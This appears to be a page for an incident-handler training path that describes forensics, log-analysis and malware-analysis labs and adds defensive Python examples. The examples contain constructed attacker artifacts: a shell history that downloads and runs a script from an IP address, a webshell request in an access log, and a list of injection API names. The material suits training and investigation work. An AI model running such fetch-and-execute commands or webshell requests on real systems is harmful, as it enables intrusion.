Become an Incident Handler

Overview
You will learn the incident response process, from building an incident response kit and developing an incident response team, to identifying, containing, and recovering from incidents. We then steer away from a traditional “defensive-only” approach to introduce you to the attacker’s world, covering basic information on reconnaissance, scanning and enumeration, attacks and maintaining persistence, evading antivirus, and maintaining stealth.
Dave starts by walking you through pre-incident planning and developing an incident response team. He then walks you through the management of incidents, including identification, containment, and eradication. You then learn proper methods for recovering from incidents, and spend some time in hands-on labs getting familiar with incident response and digital forensic techniques. You will then get an introduction to the MITRE ATT&CK framework, including a deep dive into threat intelligence. Continuing the journey on the offensive side of things, you learn about scanning with Nmap and get some hands-on experience in a lab. You then learn about different attack types, ways to maintain persistence, evasion techniques, and how to be stealthier using techniques like Ghostwriting. The path wraps up with an overview of forensic tools.
DFIR Investigations and Witness Testimony

Analyzing Attacks for Incident Handlers

Online Reconnaissance

Scanning and Enumeration with NMAP

MITRE ATT&CK Defender™ (MAD) ATT&CK® Cyber Threat Intelligence Certification Training

Evasion for Incident Handlers

Stealth Techniques for Incident Handlers

Finding Malicious Indicators Lab
In this lab, you will examine a system that has been compromised by an attacker and is still under active compromise. You have likely read articles in the news or heard from your professors about high-profile attacks in which large companies had systems compromised. It is important to be able to look at a system and know how to examine it in order to determine whether it has been compromised. Utilities built into the operating system, as well as third-party tools, can help you make that determination. Common tasks performed when checking for a compromise include examining network connections, examining file timestamps, viewing the registry, and dumping and examining the system's RAM. This lab will help you learn about the possible indications of a compromised system.

Log Analysis Lab
This lab is part of a series of lab exercises intended to support courseware for Forensics training. The development of this document is funded by the Department of Labor (DOL) Trade Adjustment Assistance Community College and Career Training (TAACCCT) Grant No. TC-22525-11-60-A-48. In this lab, students will examine log files from Windows and Linux systems to find evidence of attacker activity. This lab includes the following tasks:
Task 1 – Examining Windows Event Logs
Task 2 – Examining Windows IIS Logs
Task 3 – Examining Linux Log Files

Log Correlation & Analysis to Identify Potential IOC
When defending networked digital systems, attention must be paid to the logging mechanisms put in place to detect suspicious behavior. In this lab, students will work with Splunk to correlate server logs, system logs, and application logs in order to determine whether an attacker was successful and, if so, what happened and how they got in.

Performing Incident Response in a Windows Environment
Take on the role of the lead incident responder on a sysadmin team, and use incident response methodologies to: determine what happened, identify any malicious files found on the system, take the appropriate steps to resolve any discovered issues, and investigate critical system modifications to determine if a virus was installed on the machine.

Forensic Analysis of a Linux System Lab
In this lab, you will learn how to search through a forensic disk image in dd format to find artifacts related to an intrusion on a Linux server. Relevant forensic artifacts on a Linux system include the Apache log files, each user's shell history file, and the secure or auth.log file, which records valuable information such as SSH connections and user account activity. You will find that forensic analysis of a Linux system is far different from forensics on Windows.
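The correlation that the Log Correlation lab describes with Splunk, and the Linux artifacts named in this lab, can also be worked by hand with a short script. The example below is added here and is not code from the course or its labs: it parses an Apache access log and an auth.log into one timeline, ties in commands from a .bash_history, and flags any source IP that links the artifacts together. Every log line, host name and IP address is constructed for the example; the year supplied for the year-less syslog timestamps, the assumption that the server clock is UTC, and the crude webshell request pattern are assumptions of the example, not rules from the course.

```python
import re
from datetime import datetime, timezone

# Constructed sample artifacts (not from the course labs): an Apache access
# log, an auth.log and a .bash_history as they might be read from a dd image
# mounted read-only. The server clock is assumed to be UTC.
ACCESS_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:03:11 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:03:40 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 88 "-" "curl/7.88.1"
198.51.100.3 - - [12/Mar/2024:10:05:02 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""
AUTH_LOG = """\
Mar 12 10:04:15 web01 sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar 12 10:04:20 web01 sshd[2210]: Accepted password for www-data from 203.0.113.7 port 51022 ssh2
Mar 12 10:04:21 web01 sshd[2210]: pam_unix(sshd:session): session opened for user www-data by (uid=0)
Mar 12 10:30:00 web01 sudo:   alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
"""
BASH_HISTORY = """\
ls -la /var/www/html/uploads
wget http://203.0.113.7/x.sh -O /tmp/x.sh
chmod +x /tmp/x.sh
/tmp/x.sh
"""

SYSLOG_YEAR = 2024  # assumption: syslog timestamps carry no year, so one is supplied

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
AUTH_RE = re.compile(r'^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (\S+?)(?:\[\d+\])?: (.*)$')
IP_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
WEBSHELL_RE = re.compile(r'\.php\?(?:cmd|exec|c)=')  # crude webshell heuristic (assumption)


def parse_access(text):
    """Apache combined log -> events with tz-aware timestamps."""
    events = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            ip, ts, method, path, status = m.groups()
            events.append({"ts": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
                           "source": "apache", "ip": ip,
                           "detail": f"{method} {path} -> {status}"})
    return events


def parse_auth(text, year=SYSLOG_YEAR):
    """auth.log -> events keyed by the logging program (sshd, sudo, ...)."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts, prog, msg = m.groups()
            ts = " ".join(ts.split())  # collapse the double space of single-digit days
            when = datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")
            ipm = IP_RE.search(msg)
            events.append({"ts": when.replace(tzinfo=timezone.utc), "source": prog,
                           "ip": ipm.group(0) if ipm else None, "detail": msg.strip()})
    return events


def parse_history(text):
    """.bash_history has no timestamps; keep the commands that name an IP."""
    return [{"ts": None, "source": "bash_history", "ip": ip, "detail": cmd}
            for cmd in text.splitlines() for ip in IP_RE.findall(cmd)]


def timeline(access_text, auth_text, year=SYSLOG_YEAR):
    """Merged, time-ordered view across the two timestamped sources."""
    return sorted(parse_access(access_text) + parse_auth(auth_text, year), key=lambda e: e["ts"])


def correlate(access_text, auth_text, history_text, year=SYSLOG_YEAR):
    """Group every event by source IP and flag the IPs that tie the artifacts together."""
    events = parse_access(access_text) + parse_auth(auth_text, year) + parse_history(history_text)
    by_ip = {}
    for e in events:
        if e["ip"]:
            by_ip.setdefault(e["ip"], {}).setdefault(e["source"], []).append(e)
    report = {}
    for ip, sources in by_ip.items():
        ssh_ok = any("Accepted" in e["detail"] for e in sources.get("sshd", []))
        webshell = any(WEBSHELL_RE.search(e["detail"]) for e in sources.get("apache", []))
        report[ip] = {"sources": sorted(sources), "ssh_accepted": ssh_ok, "webshell_hit": webshell,
                      # one IP seen in two or more independent artifacts, or a webshell
                      # request, is worth escalating as an indicator of compromise
                      "suspicious": webshell or len(sources) >= 2}
    return report


if __name__ == "__main__":
    for e in timeline(ACCESS_LOG, AUTH_LOG):
        print(e["ts"].isoformat(), e["source"], e["ip"] or "-", e["detail"])
    for ip, r in correlate(ACCESS_LOG, AUTH_LOG, BASH_HISTORY).items():
        print(ip, r)
```

Run against the constructed data, the timeline shows the webshell request, the failed and then accepted SSH login and the session open within about a minute from one address, and that same address reappears in the shell history as the download source, which is the kind of cross-artifact link the lab asks you to find. On a real image, point the parsers at the files under the read-only mount rather than the inline strings.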

Forensic Analysis of a Windows 10 Client Lab
In this lab, you will learn how to search through a forensic disk image in dd format to find artifacts related to an intrusion on a Windows client machine. Windows client machines are a large target for attackers because end users, who may lack security awareness, can download malicious files or open malicious attachments. Relevant forensic artifacts on a Windows client include the Windows event logs (the .evtx files that Event Viewer displays) and registry entries.

Forensic Analysis of Windows Server Lab
In this lab, you will learn how to search through a forensic disk image in dd format to find artifacts related to an intrusion on a Windows server. Compromising a Windows server, especially a domain controller, is an attacker's dream, because the Domain Admin account can then be leveraged to control most of the other systems in the network. Relevant forensic artifacts on a Windows server include log files, the Windows event logs, and registry entries.

Memory Analysis Lab
This lab is part of a series of lab exercises designed through a grant initiative by the Center for Systems Security and Information Assurance (CSSIA) and the Network Development Group (NDG) and funded by the National Science Foundation's (NSF) Advanced Technological Education (ATE) program, Department of Undergraduate Education (DUE) Award Nos. 0702872 and 1002746. By the end of this lab, students will have used various methods to determine whether an attacker attempted a breach or successfully compromised a system. Some information about the attacker, such as the IP address of a live connection, may be lost if the machine is shut down. For this reason, an investigator collects volatile data before shutting down a system. This lab includes the following tasks:
Task 1 – Obtaining a dump of physical memory using DumpIt
Task 2 – Attacking the victim system with Armitage
Task 3 – Using Volatility to determine remote connections

Static and Dynamic Malware Analysis Lab
In this lab, students will perform static and dynamic malware analysis. Analyzing malware matters for many reasons: it can reveal who crafted a payload, what actions the malware tries to perform, and which indicators defenders should look for on other systems. Static analysis examines the file without executing it, looking at its hashes, embedded strings, imports, and structure. Dynamic analysis runs the file, ideally in an isolated virtual machine that is not connected to a real network, and observes the network and process activity it generates on the system.
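The static side of the lab can be shown with a few lines of code. The example below is added here and is not code from the course: it does what the `strings` utility does (printable ASCII runs, plus the UTF-16LE runs that Windows binaries carry and that `strings -el` reports), hashes the sample, and sorts the recovered strings into the buckets an analyst triages first: URLs, IP addresses, injection-related API names, and an autorun registry path. The byte blob is a constructed stand-in for a dropper, not a real sample, and the list of API names is an illustrative assumption rather than a complete rule set.

```python
import hashlib
import re

# Constructed stand-in for a dropper: junk bytes around ASCII and UTF-16LE
# strings of the kind a Windows sample embeds. Not a real malware sample.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"
    + b"kernel32.dll\x00CreateRemoteThread\x00VirtualAllocEx\x00\x01\x02\x03"
    + "http://203.0.113.7/stage2.bin".encode("utf-16le") + b"\x00\x00\x7f\x80"
    + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16le")
    + b"\x00\x00ab\x00\xfe"
)

# Illustrative list (assumption): imports whose presence together is a classic
# process-injection / downloader / anti-debug pattern.
SUSPICIOUS_APIS = {"CreateRemoteThread", "VirtualAllocEx", "WriteProcessMemory",
                   "WinExec", "URLDownloadToFileA", "IsDebuggerPresent"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_strings(data, min_len=4):
    """Like `strings -a` plus `strings -el`: return (offset, encoding, text) sorted by offset."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16le")) for m in utf16_re.finditer(data)]
    return sorted(found)


def triage(data):
    """Static triage: hash the sample and bucket its strings into indicator categories."""
    report = {"sha256": hashlib.sha256(data).hexdigest(),
              "urls": [], "ips": [], "apis": [], "persistence": [], "string_count": 0}
    for _offset, _encoding, s in extract_strings(data):
        report["string_count"] += 1
        report["urls"] += URL_RE.findall(s)
        report["ips"] += IP_RE.findall(s)
        if s in SUSPICIOUS_APIS:
            report["apis"].append(s)
        if "\\CurrentVersion\\Run" in s:  # autorun key named inside the binary
            report["persistence"].append(s)
    return report


if __name__ == "__main__":
    for offset, encoding, text in extract_strings(SAMPLE):
        print(f"{offset:#08x} {encoding:8} {text}")
    print(triage(SAMPLE))
```

The SHA-256 is what you record before anything else and what you search for in threat intelligence feeds; the URL and IP are network indicators to block and hunt for; the pair of injection APIs and the Run key tell you what to expect when the sample is later detonated in the dynamic phase.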

Open Source Collection
The Open Source Collection lab is designed to familiarize students with the advanced search functionality of Google, the default web pages that web servers serve out of the box, and the specifics of the Google Hacking Database. This allows students to understand how open source information can be used for exploitation purposes.

Scanning and Mapping Networks
Students will use Zenmap to scan a network segment in order to create an updated network map and detail findings on the systems discovered. They will then compare the material they generated with a previously generated network map/scan to discover whether there have been any changes to the network.

Introduction to Single Purpose Forensic Tools Lab
This lab is part of a series of lab exercises intended to support courseware for Forensics training. The development of this document is funded by the Department of Labor (DOL) Trade Adjustment Assistance Community College and Career Training (TAACCCT) Grant No. TC-22525-11-60-A-48. In this lab, students will use single-purpose forensic tools to verify evidence integrity and recover data from a disk image. This lab includes the following tasks:
Task 1 – Using file hashing tools to verify integrity
Task 2 – Mounting a partition with deleted files and folders
Task 3 – Using Foremost to carve files
Task 4 – Using a HEX editor
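Two of these tasks, integrity hashing and header/footer carving, are simple enough to show end to end. The example below is added here and is not code from the course or from Foremost: it builds a constructed image containing three "deleted" files in unallocated space, hashes the image before touching it, carves by the same header/footer method Foremost uses (with a subset of its signatures), and re-hashes afterwards to prove the evidence file was not altered. The image contents, the signature list and the size cap for a file whose footer never appears are all constructed or assumed for the example.

```python
import hashlib
import os
import tempfile

# Header/footer signatures: a constructed subset of what Foremost carves by
# default. MAX_SIZE caps a carve whose footer is never found (assumption).
SIGNATURES = [
    ("jpg", b"\xff\xd8\xff", b"\xff\xd9"),
    ("png", b"\x89PNG\r\n\x1a\n", b"IEND\xaeB\x60\x82"),
    ("pdf", b"%PDF-", b"%%EOF"),
]
MAX_SIZE = 64 * 1024


def build_sample_image():
    """Constructed stand-in for a dd image: three 'deleted' files surrounded by zeroed space."""
    jpg = b"\xff\xd8\xff\xe0" + b"JFIF payload " * 4 + b"\xff\xd9"
    png = b"\x89PNG\r\n\x1a\n" + b"IHDR" + b"\x00" * 13 + b"IDAT pixels " * 3 + b"IEND\xaeB\x60\x82"
    pdf = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n" + b"%%EOF"
    gap = b"\x00" * 512
    return gap + jpg + gap + png + gap + pdf + gap


def carve(data, signatures=SIGNATURES, max_size=MAX_SIZE):
    """Header/footer carving: each header hit yields one file, cut at the first footer."""
    carved = []
    for name, header, footer in signatures:
        start = data.find(header)
        while start != -1:
            end = data.find(footer, start + len(header), start + max_size)
            blob = data[start:end + len(footer)] if end != -1 else data[start:start + max_size]
            carved.append((name, start, blob))
            start = data.find(header, start + len(blob))
    return sorted(carved, key=lambda c: c[1])


def sha256_file(path, chunk=1 << 20):
    """Chunked SHA-256 so a multi-gigabyte image is never read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def carve_image_file(path, outdir):
    """Hash, carve into outdir, re-hash: the evidence file must be byte-identical afterwards."""
    before = sha256_file(path)
    with open(path, "rb") as f:
        data = f.read()  # fine for a demo image; stream a real one in windows
    names = []
    for i, (kind, offset, blob) in enumerate(carve(data)):
        name = f"{i:08d}_{offset}.{kind}"
        with open(os.path.join(outdir, name), "wb") as out:
            out.write(blob)
        names.append(name)
    after = sha256_file(path)
    return {"sha256": before, "unchanged": before == after, "files": names}


def demo():
    """Write the constructed image to a temp dir, carve it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        image = os.path.join(tmp, "evidence.dd")
        with open(image, "wb") as f:
            f.write(build_sample_image())
        return carve_image_file(image, tmp)


if __name__ == "__main__":
    print(demo())
```

The before/after hash is the check an examiner records in the case notes; if the two values ever differ, the carving step, the mount, or the tooling touched the evidence and the results are not defensible. Real carving also has to cope with fragmented files and false header hits, which is why Foremost's configuration carries per-type size limits and why carved output is always verified by opening it.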